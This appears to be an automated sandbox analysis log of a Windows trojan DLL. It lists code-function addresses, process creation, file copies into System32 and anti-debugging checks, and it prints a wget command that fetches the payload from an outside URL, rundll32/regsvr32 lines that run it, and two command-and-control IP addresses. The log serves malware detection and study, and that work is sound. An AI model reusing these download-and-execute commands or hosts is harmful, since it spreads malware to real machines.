Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014F6688 5_2_014F6688
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014F3698 5_2_014F3698
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014F0EAB 5_2_014F0EAB
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014EA6B8 5_2_014EA6B8
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001EA80000000 6_2_000001EA80000000
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_00000292F30A0000 7_2_00000292F30A0000
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00440000 8_2_00440000
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004994E8 8_2_004994E8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A409C 8_2_004A409C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A5C94 8_2_004A5C94
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B5D7C 8_2_004B5D7C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A25B4 8_2_004A25B4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00497E74 8_2_00497E74
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049BA00 8_2_0049BA00
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A6628 8_2_004A6628
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004AB6C0 8_2_004AB6C0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049FEDC 8_2_0049FEDC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00495EE4 8_2_00495EE4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B6688 8_2_004B6688
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B4F70 8_2_004B4F70
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A3320 8_2_004A3320
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004AA38C 8_2_004AA38C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00497BB8 8_2_00497BB8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00496C40 8_2_00496C40
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00498458 8_2_00498458
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B446C 8_2_004B446C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A6C60 8_2_004A6C60
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049B078 8_2_0049B078
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B3078 8_2_004B3078
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B087C 8_2_004B087C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A7870 8_2_004A7870
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00499474 8_2_00499474
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A7C04 8_2_004A7C04
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B1418 8_2_004B1418
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B6410 8_2_004B6410
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004AF414 8_2_004AF414
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A3C2C 8_2_004A3C2C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00493C20 8_2_00493C20
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049F038 8_2_0049F038
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049383C 8_2_0049383C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004AA83C 8_2_004AA83C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A54C4 8_2_004A54C4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00491CD8 8_2_00491CD8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049F8D0 8_2_0049F8D0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004948D4 8_2_004948D4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B48F8 8_2_004B48F8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A70FC 8_2_004A70FC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049248C 8_2_0049248C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049FC84 8_2_0049FC84
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B6098 8_2_004B6098
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049409C 8_2_0049409C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A80A4 8_2_004A80A4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049AD48 8_2_0049AD48
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004AB95C 8_2_004AB95C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B3D54 8_2_004B3D54
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B6D60 8_2_004B6D60
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00498564 8_2_00498564
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004AE964 8_2_004AE964
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049DD78 8_2_0049DD78
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B0D7C 8_2_004B0D7C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004AF108 8_2_004AF108
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A9D18 8_2_004A9D18
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00491910 8_2_00491910
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A4D10 8_2_004A4D10
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00495914 8_2_00495914
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004AF528 8_2_004AF528
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B1528 8_2_004B1528
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049E538 8_2_0049E538
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00497D3C 8_2_00497D3C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B45C4 8_2_004B45C4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004AC9D8 8_2_004AC9D8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004925DC 8_2_004925DC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004939D4 8_2_004939D4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049FDD4 8_2_0049FDD4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00492DE8 8_2_00492DE8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B21FC 8_2_004B21FC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B4180 8_2_004B4180
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A1DA8 8_2_004A1DA8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A11AC 8_2_004A11AC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B71A0 8_2_004B71A0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B31A4 8_2_004B31A4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049CDB0 8_2_0049CDB0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B4DB4 8_2_004B4DB4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00493248 8_2_00493248
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00494E58 8_2_00494E58
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049E254 8_2_0049E254
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A7E54 8_2_004A7E54
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00491208 8_2_00491208
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A0E04 8_2_004A0E04
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A561C 8_2_004A561C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004AA228 8_2_004AA228
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A6238 8_2_004A6238
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00499230 8_2_00499230
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004AC230 8_2_004AC230
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049AACC 8_2_0049AACC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00492EE8 8_2_00492EE8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B02E8 8_2_004B02E8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049DEF0 8_2_0049DEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00491A88 8_2_00491A88
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004AAA8C 8_2_004AAA8C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A828C 8_2_004A828C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B3698 8_2_004B3698
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049229C 8_2_0049229C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A529C 8_2_004A529C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B0EAB 8_2_004B0EAB
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A42A0 8_2_004A42A0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B2AA4 8_2_004B2AA4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004AA6B8 8_2_004AA6B8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A775C 8_2_004A775C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A3F50 8_2_004A3F50
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A7368 8_2_004A7368
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00494B78 8_2_00494B78
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049E37C 8_2_0049E37C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004AFB7C 8_2_004AFB7C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B1B0C 8_2_004B1B0C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B1F04 8_2_004B1F04
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049B714 8_2_0049B714
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049433C 8_2_0049433C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049A73C 8_2_0049A73C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004ACBC4 8_2_004ACBC4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B2BD0 8_2_004B2BD0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A47EC 8_2_004A47EC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004927E0 8_2_004927E0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B17E4 8_2_004B17E4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A8788 8_2_004A8788
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049BF84 8_2_0049BF84
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004AF794 8_2_004AF794
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00492FA8 8_2_00492FA8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049F7A8 8_2_0049F7A8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004B4BAC 8_2_004B4BAC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004AEFA4 8_2_004AEFA4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004AAFB8 8_2_004AAFB8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_004A23B4 8_2_004A23B4
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 0000000180029B0C appears 44 times
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\wget.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV/" > cmdline.out 2>&1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV/"
Source: unknown Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\download\NjszMzh0ar.dll"
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\download\NjszMzh0ar.dll",#1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\download\NjszMzh0ar.dll
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\download\NjszMzh0ar.dll",#1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\download\NjszMzh0ar.dll,AOBplENEwxGsLJOHWaHDTizor
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\QKXGFEEVVr\VycaGa.dll"
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\download\NjszMzh0ar.dll,BSUOlvQdFaMbSsYDjgkGG
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\download\NjszMzh0ar.dll,DllRegisterServer
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV/"
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\download\NjszMzh0ar.dll",#1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\download\NjszMzh0ar.dll
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\download\NjszMzh0ar.dll,AOBplENEwxGsLJOHWaHDTizor
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\download\NjszMzh0ar.dll,BSUOlvQdFaMbSsYDjgkGG
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\download\NjszMzh0ar.dll,DllRegisterServer
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\download\NjszMzh0ar.dll",#1
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\QKXGFEEVVr\VycaGa.dll"
Source: C:\Windows\SysWOW64\wget.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\Desktop\cmdline.out
Source: classification engine Classification label: mal100.troj.evad.win@22/3@1/29
Source: C:\Windows\System32\regsvr32.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_014DBA00 CreateToolhelp32Snapshot,Process32NextW,Process32FirstW,FindCloseChangeNotification, 5_2_014DBA00
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\download\NjszMzh0ar.dll",#1
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7048:120:WilError_01
Source: C:\Windows\SysWOW64\wget.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\wget.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800116CD push rdi; ret 5_2_00000001800116D4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180011C59 push rdi; ret 5_2_0000000180011C62
Source: NjszMzh0ar.dll.2.dr Static PE information: section name: _RDATA
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\download\NjszMzh0ar.dll
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\QKXGFEEVVr\VycaGa.dll (copy)
Source: C:\Windows\SysWOW64\wget.exe File created: C:\Users\user\Desktop\download\NjszMzh0ar.dll
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\QKXGFEEVVr\VycaGa.dll (copy)

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\QKXGFEEVVr\VycaGa.dll:Zone.Identifier read attributes | delete
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe API coverage: 6.3 %
Source: C:\Windows\System32\regsvr32.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180031F98 _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 5_2_0000000180031F98
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180032754 FindFirstFileExW, 5_2_0000000180032754
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180032C30 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 5_2_0000000180032C30
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180031F98 _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 5_2_0000000180031F98
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0049FEDC FindNextFileW,FindFirstFileW, 8_2_0049FEDC
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation
Source: regsvr32.exe, 00000008.00000002.649399940.00000000005B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.649517478.00000000005DB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.471413003.00000000005B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.471552256.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.471580346.00000000005B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: regsvr32.exe, 00000008.00000002.649517478.00000000005DB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.471413003.00000000005B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.471552256.00000000005DA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000010.00000002.649151434.000001FBD6402000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: wget.exe, 00000002.00000002.382696287.0000000000B78000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.649217359.000001FBD6428000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180046AFC IsDebuggerPresent, 5_2_0000000180046AFC
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018003588C GetProcessHeap, 5_2_000000018003588C
Source: C:\Windows\System32\loaddll64.exe Process queried: DebugPort
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000218C SetUnhandledExceptionFilter, 5_2_000000018000218C
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180001A30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_0000000180001A30
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180028DE4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_0000000180028DE4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180001FA4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_0000000180001FA4

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\regsvr32.exe Network Connect: 45.55.191.130 443
Source: C:\Windows\System32\regsvr32.exe Network Connect: 213.239.212.5 443
Source: C:\Windows\System32\loaddll64.exe Section loaded: C:\Users\user\Desktop\download\NjszMzh0ar.dll
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\download\NjszMzh0ar.dll",#1
Source: C:\Windows\SysWOW64\wget.exe Queries volume information: C:\Users\user\Desktop\download VolumeInformation
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 5_2_0000000180040170
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 5_2_00000001800401F4
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 5_2_00000001800402C4
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 5_2_0000000180040384
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW, 5_2_000000018002A3C4
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 5_2_00000001800294B8
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 5_2_0000000180029564
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW, 5_2_00000001800405D0
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 5_2_00000001800295EC
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 5_2_0000000180040728
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW, 5_2_00000001800407FC
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 5_2_0000000180040928
Source: C:\Windows\System32\regsvr32.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW, 5_2_000000018003FE24
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800280B0 cpuid 5_2_00000001800280B0
Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000239C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 5_2_000000018000239C

Stealing of Sensitive Information

Source: Yara match File source: 00000008.00000002.649302129.0000000000578000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 5.2.regsvr32.exe.14a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.292f30b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.regsvr32.exe.14a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.292f30b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.450000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.rundll32.exe.1ea80010000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.rundll32.exe.1ea80010000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.397283581.00000292F30B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.400285901.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.649181292.0000000000491000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.395347211.000001EA80041000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.395275821.000001EA80010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.400314253.00000000014D1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.649048864.0000000000450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.397309936.00000292F30E1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY